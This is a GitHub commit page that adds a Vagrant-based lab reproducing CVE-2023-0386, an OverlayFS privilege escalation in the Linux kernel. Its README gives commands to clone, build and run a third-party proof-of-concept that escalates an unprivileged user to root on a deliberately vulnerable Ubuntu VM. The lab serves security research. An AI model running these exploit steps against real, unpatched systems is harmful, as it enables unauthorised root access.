Skip to content

Commit 2c73398

Browse files
christophetdchristophetd
committed
Add CVE-2023-0386 reproduction
1 parent 275d8fe commit 2c73398

File tree

5 files changed

+66
-0
lines changed

5 files changed

+66
-0
lines changed

proof-of-concept-exploits/overlayfs-cve-2023-0386/.gitignore

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
.vagrant

proof-of-concept-exploits/overlayfs-cve-2023-0386/README.md

+45
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
# CVE-2023-0386
2+
3+
This folder contains a virtual machine and instructions to reproduce [CVE-2023-0386](https://nvd.nist.gov/vuln/detail/CVE-2023-0386), a vulnerability in the Linux kernel’s OverlayFS subsystem that allows an unprivileged user to escalate their privileges to root.
4+
5+
## How to reproduce
6+
7+
* Start the virtual machine (based on Ubuntu 22.04.1, kernel 5.15.0-57-generic):
8+
9+
```
10+
vagrant up
11+
```
12+
13+
* SSH to the machine as an unprivileged user:
14+
15+
```
16+
vagrant ssh --command "sudo su john -c 'cd; bash'"
17+
```
18+
19+
```bash
20+
john@ubuntu-jammy:~$ id
21+
uid=1002(john) gid=1002(john) groups=1002(john)
22+
```
23+
24+
* Clone and compile the [proof of concept repository](https://github.com/xkaneiki/CVE-2023-0386/)
25+
26+
```
27+
git clone https://github.com/xkaneiki/CVE-2023-0386.git
28+
cd CVE-2023-0386
29+
git checkout c4c65cefca1365c807c397e953d048506f3de195
30+
make all
31+
```
32+
33+
* Run the following commands to exploit the vulnerability and escalate to root:
34+
35+
```
36+
./fuse ./ovlcap/lower ./gc >/dev/null 2>&1 &
37+
./exp
38+
```
39+
40+
![](./screenshot.png)
41+
42+
## Credits
43+
44+
Proof-of-concept: https://github.com/xkaneiki/CVE-2023-0386/
45+
Reproduction for Datadog: Ryan Simon

proof-of-concept-exploits/overlayfs-cve-2023-0386/Vagrantfile

+11
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
Vagrant.configure("2") do |config|
2+
config.vm.box="ubuntu-22.04-vulnerable"
3+
config.vm.box_url = "https://cloud-images.ubuntu.com/releases/22.04/release-20230107/ubuntu-22.04-server-cloudimg-amd64-vagrant.box"
4+
config.vm.box_download_checksum = "f37c8dbda2d712ffb6242b7b9d88058298caf3a860ae29620de1cd4d02b59a9a"
5+
config.vm.box_download_checksum_type = "sha256"
6+
7+
# Disable the default synced folder
8+
config.vm.synced_folder '.', '/vagrant', disabled: true
9+
10+
config.vm.provision "shell", path: "provision.sh"
11+
end

proof-of-concept-exploits/overlayfs-cve-2023-0386/provision.sh

+9
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
#!/bin/bash
2+
3+
# Pre-requisites
4+
sudo apt update
5+
sudo apt-get install -y make gcc libfuse-dev libcap-dev
6+
7+
8+
# Underprivileged user
9+
sudo useradd john --create-home --shell /bin/bash

proof-of-concept-exploits/overlayfs-cve-2023-0386/screenshot.png

118 KB
Loading

0 commit comments

Comments
 (0)